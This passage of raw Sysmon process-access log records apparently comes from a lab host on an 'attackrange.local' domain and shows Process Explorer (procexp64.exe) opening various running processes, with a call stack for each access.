STEM32\ntdll.dll+51791 10341000x8000000000000000790347Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790346Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790345Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790344Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790343Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790342Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790341Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790340Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790339Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790338Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790337Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790336Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790335Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790334Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790333Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790332Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790331Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790330Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet 